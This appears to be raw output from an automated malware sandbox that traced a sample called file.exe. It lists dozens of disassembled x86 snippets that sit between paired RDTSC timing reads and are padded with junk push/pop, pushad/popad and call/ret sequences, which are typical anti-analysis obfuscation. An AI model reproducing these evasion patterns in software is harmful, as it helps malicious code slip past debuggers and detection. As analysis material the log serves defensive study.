                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD95B second address: FBD973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD973 second address: FBD977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF35E second address: FBF37B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67208644C8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F67208644CCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF37B second address: FBF3B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f jnc 00007F672053310Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F672053310Fh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF3B5 second address: E419C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b mov si, E1EAh 0x0000000f push dword ptr [ebp+122D0DD1h] 0x00000015 push edx 0x00000016 pop esi 0x00000017 call dword ptr [ebp+122D2D68h] 0x0000001d pushad 0x0000001e jmp 00007F67208644D1h 0x00000023 pushad 0x00000024 jmp 00007F67208644D6h 0x00000029 mov dword ptr [ebp+122D225Bh], ecx 0x0000002f popad 0x00000030 xor eax, eax 0x00000032 mov dword ptr [ebp+122D225Bh], eax 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c jmp 00007F67208644CCh 0x00000041 mov dword ptr [ebp+122D2B50h], eax 0x00000047 cmc 0x00000048 add dword ptr [ebp+122D225Bh], esi 0x0000004e mov esi, 0000003Ch 0x00000053 cld 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 pushad 0x00000059 mov dword ptr [ebp+122D225Bh], ecx 0x0000005f pushad 0x00000060 mov edx, dword ptr [ebp+122D2BF4h] 0x00000066 stc 0x00000067 popad 0x00000068 popad 0x00000069 lodsw 0x0000006b jmp 00007F67208644D0h 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 sub dword ptr [ebp+122D225Bh], edi 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e mov dword ptr [ebp+122D225Bh], ecx 0x00000084 nop 0x00000085 pushad 0x00000086 push ecx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF3F6 second address: FBF429 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6720533106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F6720533114h 0x00000019 je 00007F6720533106h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF429 second address: FBF4EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D207Ch], edx 0x00000011 push 00000000h 0x00000013 jmp 00007F67208644CBh 0x00000018 push 139E6A86h 0x0000001d jmp 00007F67208644D0h 0x00000022 xor dword ptr [esp], 139E6A06h 0x00000029 mov ecx, dword ptr [ebp+122D2C08h] 0x0000002f push 00000003h 0x00000031 jng 00007F67208644D2h 0x00000037 jbe 00007F67208644CCh 0x0000003d mov dword ptr [ebp+122D1BE4h], edi 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push esi 0x00000048 call 00007F67208644C8h 0x0000004d pop esi 0x0000004e mov dword ptr [esp+04h], esi 0x00000052 add dword ptr [esp+04h], 00000019h 0x0000005a inc esi 0x0000005b push esi 0x0000005c ret 0x0000005d pop esi 0x0000005e ret 0x0000005f sub dword ptr [ebp+122D1931h], ecx 0x00000065 push 00000003h 0x00000067 push 00000000h 0x00000069 push edx 0x0000006a call 00007F67208644C8h 0x0000006f pop edx 0x00000070 mov dword ptr [esp+04h], edx 0x00000074 add dword ptr [esp+04h], 00000017h 0x0000007c inc edx 0x0000007d push edx 0x0000007e ret 0x0000007f pop edx 0x00000080 ret 0x00000081 jns 00007F67208644CFh 0x00000087 push 98299581h 0x0000008c push eax 0x0000008d push edx 0x0000008e push edi 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF4EB second address: FBF4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF59C second address: FBF5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 xor dword ptr [esp], 03D8C026h 0x0000000c movzx ecx, di 0x0000000f push 00000003h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F67208644C8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d adc cx, 1781h 0x00000032 mov ecx, dword ptr [ebp+122D2B94h] 0x00000038 push 00000003h 0x0000003a sub dword ptr [ebp+122D2226h], edx 0x00000040 push 6A255765h 0x00000045 push ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF697 second address: FBF6BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F6720533118h 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F6720533106h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF6BA second address: FBF760 instructions: 0x00000000 rdtsc 0x00000002 js 00007F67208644C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2B90h] 0x00000011 and esi, 37EC672Eh 0x00000017 push 00000000h 0x00000019 call 00007F67208644D1h 0x0000001e add edi, 56C5E22Bh 0x00000024 pop esi 0x00000025 mov ch, E6h 0x00000027 push 2ABCBCA0h 0x0000002c push eax 0x0000002d pushad 0x0000002e js 00007F67208644C6h 0x00000034 jo 00007F67208644C6h 0x0000003a popad 0x0000003b pop eax 0x0000003c xor dword ptr [esp], 2ABCBC20h 0x00000043 mov si, F574h 0x00000047 push 00000003h 0x00000049 add dx, DCA1h 0x0000004e push 00000000h 0x00000050 push 00000000h 0x00000052 push edx 0x00000053 call 00007F67208644C8h 0x00000058 pop edx 0x00000059 mov dword ptr [esp+04h], edx 0x0000005d add dword ptr [esp+04h], 0000001Dh 0x00000065 inc edx 0x00000066 push edx 0x00000067 ret 0x00000068 pop edx 0x00000069 ret 0x0000006a jbe 00007F67208644CCh 0x00000070 mov edx, dword ptr [ebp+122D2C20h] 0x00000076 push 00000003h 0x00000078 sub ecx, dword ptr [ebp+122D2B30h] 0x0000007e call 00007F67208644C9h 0x00000083 push eax 0x00000084 push edx 0x00000085 pushad 0x00000086 push esi 0x00000087 pop esi 0x00000088 pushad 0x00000089 popad 0x0000008a popad 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF760 second address: FBF796 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6720533108h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F6720533118h 0x00000014 jmp 00007F672053310Ah 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF796 second address: FBF79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF79A second address: FBF7BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533117h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF7BF second address: FBF82A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67208644C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [eax] 0x0000000d jg 00007F67208644CEh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007F67208644D4h 0x0000001c pop eax 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F67208644C8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov dx, ax 0x0000003a lea ebx, dword ptr [ebp+1245129Dh] 0x00000040 mov dword ptr [ebp+122D317Eh], esi 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 ja 00007F67208644C8h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF82A second address: FBF842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F672053310Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF842 second address: FBF848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD28AA second address: FD28AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD28AE second address: FD28C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB647D second address: FB6481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF728 second address: FDF72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF72E second address: FDF736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF87D second address: FDF881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF881 second address: FDF893 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F6720533106h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF893 second address: FDF897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDFB2F second address: FDFB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDFB36 second address: FDFB3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDFB3B second address: FDFB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6720533106h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0079 second address: FE0080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0080 second address: FE008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F6720533106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE031F second address: FE0323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5AFD second address: FD5B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F672053310Ah 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5B14 second address: FD5B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF921 second address: FAF927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE047E second address: FE0482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0482 second address: FE0486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0486 second address: FE04AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F67208644D9h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE04AF second address: FE04E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F6720533115h 0x00000010 jmp 00007F6720533112h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0AB8 second address: FE0AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F67208644D6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0C74 second address: FE0C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F6720533106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F672053310Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0C8E second address: FE0CC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D2h 0x00000007 jmp 00007F67208644CAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F67208644CBh 0x00000016 push esi 0x00000017 pop esi 0x00000018 jbe 00007F67208644C6h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0E2D second address: FE0E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE12C3 second address: FE12C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2A97 second address: FE2AAD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6720533106h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F6720533106h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2AAD second address: FE2AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2AB1 second address: FE2ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6720533111h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2D56 second address: FB2D8A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67208644CCh 0x00000008 jng 00007F67208644DFh 0x0000000e jmp 00007F67208644D9h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2D8A second address: FB2D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6720533106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE6B99 second address: FE6B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE7E45 second address: FE7E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6720533112h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE7E51 second address: FE7E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F67208644C6h 0x0000000a pop eax 0x0000000b jo 00007F6720864502h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F67208644D9h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA20D second address: FEA212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA712 second address: FAA716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDA16 second address: FEDA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDA1C second address: FEDA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDA21 second address: FEDA29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDA29 second address: FEDA2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDD44 second address: FEDD49 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDED5 second address: FEDEEF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67208644D5h 0x00000008 jmp 00007F67208644CFh 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE1FD second address: FEE201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE201 second address: FEE209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE209 second address: FEE221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6720533111h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE4DC second address: FEE4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1CD0 second address: FF1CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1F8B second address: FF1FB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F67208644CCh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F67208644DEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F67208644D0h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2A46 second address: FF2A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6720533106h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2A51 second address: FF2A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2BAA second address: FF2BE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F6720533112h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2C5E second address: FF2C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3137 second address: FF313C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF313C second address: FF3142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3142 second address: FF3198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F6720533112h 0x0000000d nop 0x0000000e mov edi, dword ptr [ebp+122D191Bh] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F6720533108h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov esi, dword ptr [ebp+122D2B80h] 0x00000038 xchg eax, ebx 0x00000039 jo 00007F6720533114h 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4BF6 second address: FF4C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67208644D4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4C0E second address: FF4C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F6720533108h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov esi, 7CA45EBDh 0x0000002a or esi, dword ptr [ebp+122D2D54h] 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D2D7Bh], eax 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007F6720533108h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 sub dword ptr [ebp+122D225Bh], ebx 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jnc 00007F6720533106h 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4C86 second address: FF4C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4C8C second address: FF4C9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F6720533106h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4C9F second address: FF4CA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
